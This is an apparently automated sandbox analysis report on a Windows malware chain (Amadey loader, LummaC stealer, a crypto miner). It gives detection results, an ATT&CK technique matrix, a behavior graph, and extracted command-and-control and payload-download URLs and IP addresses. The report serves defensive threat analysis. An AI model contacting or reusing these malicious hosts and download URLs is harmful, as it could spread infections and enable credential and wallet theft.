                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQEN
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQEN
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQEN
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQEN
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQEN
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQEN
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: number of queries: 1001
                    Source: Yara matchFile source: Process Memory Space: ea17d0b77a.exe PID: 3920, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: Process Memory Space: ea17d0b77a.exe PID: 3920, type: MEMORYSTR
                    Source: Yara matchFile source: 00000030.00000003.3334314821.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.4222202528.0000000000F21000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts2
                    Windows Management Instrumentation
                    1
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    11
                    Deobfuscate/Decode Files or Information
                    LSASS Memory24
                    File and Directory Discovery
                    Remote Desktop Protocol41
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter
                    11
                    Scheduled Task/Job
                    212
                    Process Injection
                    31
                    Obfuscated Files or Information
                    Security Account Manager249
                    System Information Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts11
                    Scheduled Task/Job
                    11
                    Registry Run Keys / Startup Folder
                    11
                    Scheduled Task/Job
                    121
                    Software Packing
                    NTDS971
                    Security Software Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts2
                    PowerShell
                    Network Logon Script11
                    Registry Run Keys / Startup Folder
                    1
                    DLL Side-Loading
                    LSA Secrets2
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading
                    Cached Domain Credentials361
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items361
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation
                    Proc Filesystem11
                    Remote System Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    System Network Configuration Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579075 Sample: file.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 Antivirus detection for dropped file 2->120 122 16 other signatures 2->122 10 skotes.exe 4 84 2->10         started        15 file.exe 5 2->15         started        17 Intel_PTT_EK_Recertification.exe 2->17         started        19 skotes.exe 2->19         started        process3 dnsIp4 110 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 10->110 112 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->112 114 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 10->114 76 C:\Users\user\AppData\...\0a99277d48.exe, PE32 10->76 dropped 78 C:\Users\user\AppData\...\9434b989db.exe, PE32 10->78 dropped 80 C:\Users\user\AppData\...\ea17d0b77a.exe, PE32 10->80 dropped 86 9 other malicious files 10->86 dropped 154 Creates multiple autostart registry keys 10->154 156 Hides threads from debuggers 10->156 158 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->158 21 9434b989db.exe 10->21         started        25 ea17d0b77a.exe 10->25         started        27 c359af6492.exe 8 10->27         started        36 2 other processes 10->36 82 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->82 dropped 84 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->84 dropped 160 Detected unpacking (changes PE section rights) 15->160 162 Tries to evade debugger and weak emulator (self modifying code) 15->162 164 Tries to detect virtualization through RDTSC time measurements 15->164 30 skotes.exe 15->30         started        166 Antivirus detection for dropped file 17->166 168 Multi AV Scanner detection for dropped file 17->168 170 Suspicious powershell command line found 17->170 174 4 other signatures 17->174 32 powershell.exe 17->32         started        34 explorer.exe 17->34         started        172 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 19->172 file5 signatures6 process7 dnsIp8 98 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 21->98 124 Antivirus detection for dropped file 21->124 126 Detected unpacking (changes PE section rights) 21->126 128 Tries to detect sandboxes and other dynamic analysis tools (window names) 21->128 144 6 other signatures 21->144 100 172.67.197.170 CLOUDFLARENETUS United States 25->100 130 Query firmware table information (likely to detect VMs) 25->130 132 Machine Learning detection for dropped file 25->132 134 Found many strings related to Crypto-Wallets (likely being stolen) 25->134 136 LummaC encrypted strings found 25->136 88 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 27->88 dropped 90 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 27->90 dropped 38 cmd.exe 2 27->38         started        138 Multi AV Scanner detection for dropped file 30->138 140 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 30->140 146 2 other signatures 30->146 41 PING.EXE 32->41         started        44 conhost.exe 32->44         started        102 185.156.73.23 RELDAS-NETRU Russian Federation 36->102 104 185.121.15.192 REDSERVICIOES Spain 36->104 106 2 other IPs or domains 36->106 142 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->142 148 2 other signatures 36->148 file9 signatures10 process11 dnsIp12 150 Uses cmd line tools excessively to alter registry or file data 38->150 46 in.exe 38->46         started        50 7z.exe 38->50         started        52 7z.exe 3 38->52         started        54 9 other processes 38->54 108 127.1.10.1 unknown unknown 41->108 signatures13 process14 file15 92 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 46->92 dropped 176 Suspicious powershell command line found 46->176 178 Uses cmd line tools excessively to alter registry or file data 46->178 180 Uses schtasks.exe or at.exe to add and modify task schedules 46->180 56 powershell.exe 46->56         started        59 attrib.exe 46->59         started        61 attrib.exe 46->61         started        63 schtasks.exe 46->63         started        94 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 50->94 dropped signatures16 process17 signatures18 152 Uses ping.exe to check the status of other devices and networks 56->152 65 PING.EXE 56->65         started        68 conhost.exe 56->68         started        70 conhost.exe 59->70         started        72 conhost.exe 61->72         started        74 conhost.exe 63->74         started        process19 dnsIp20 96 127.0.0.1 unknown unknown 65->96

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe50%ReversingLabsWin32.Infostealer.Tinba
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%AviraHEUR/AGEN.1352802
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%AviraHEUR/AGEN.1352802
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraHEUR/AGEN.1320706
                    C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe100%AviraTR/ATRAPS.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe100%AviraTR/ATRAPS.Gen
                    C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe100%AviraHEUR/AGEN.1320706
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe88%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe88%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe50%ReversingLabsWin32.Infostealer.Tinba
                    C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\main\extracted\in.exe70%ReversingLabsWin64.Trojan.Nekark
                    C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe70%ReversingLabsWin64.Trojan.Nekark
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    aspecteirs.latfalse
                      high
                      sweepyribs.latfalse
                        high
                        sustainskelet.latfalse
                          high
                          rapeflowwj.latfalse
                            high
                            energyaffai.latfalse
                              high
                              grannyejh.latfalse
                                high
                                necklacebudi.latfalse
                                  high
                                  crosshuaht.latfalse
                                    high
                                    http://185.215.113.206/c4becf79229cb002.phpfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://185.215.113.206/68b591d6548ec281/softokn3.dll9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://185.156.73.23/add?substr=mixtwo&s=three&sub=empNKd5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://duckduckgo.com/chrome_newtabea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://185.215.113.206/9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#c359af6492.exe.14.drfalse
                                                  high
                                                  https://discokeyus.lat/Pea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://discokeyus.lat/apiqqqqqqea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://185.156.73.23/dll/download)%Nd5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://185.215.113.16/off/def.exeJea17d0b77a.exe, 0000002F.00000003.3627075029.0000000001108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://curl.se/docs/hsts.html352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            http://185.215.113.206/68b591d6548ec281/freebl3.dll9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://185.215.113.206/68b591d6548ec281/nss3.dll9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://185.215.113.206ta9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmpfalse
                                                                  high
                                                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#c359af6492.exe.14.drfalse
                                                                    high
                                                                    http://185.156.73.23/files/download.hid5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://185.215.113.206/dq9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://185.215.113.206/c4becf79229cb002.phpecee80c0ba92f6f38a0bad9769dfExtension9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmpfalse
                                                                            unknown
                                                                            http://185.156.73.23/soft/downloadI$.d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ocsp.rootca1.amazontrust.com0:ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://curl.se/docs/alt-svc.html352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://xmrig.com/wizardIntel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.ecosia.org/newtab/ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpfalse
                                                                                              high
                                                                                              http://185.156.73.23/soft/download&%d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864020294.000000000595C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://httpbin.org/ipbefore352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zc359af6492.exe.14.drfalse
                                                                                                      high
                                                                                                      https://g-cleanit.hkd5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://discokeyus.lat/jBpk9ea17d0b77a.exe, 0000002F.00000003.3537566773.00000000010F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://185.156.73.23/files/downloadd5cd5e4aa8.exe, 0000002E.00000003.3608285796.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
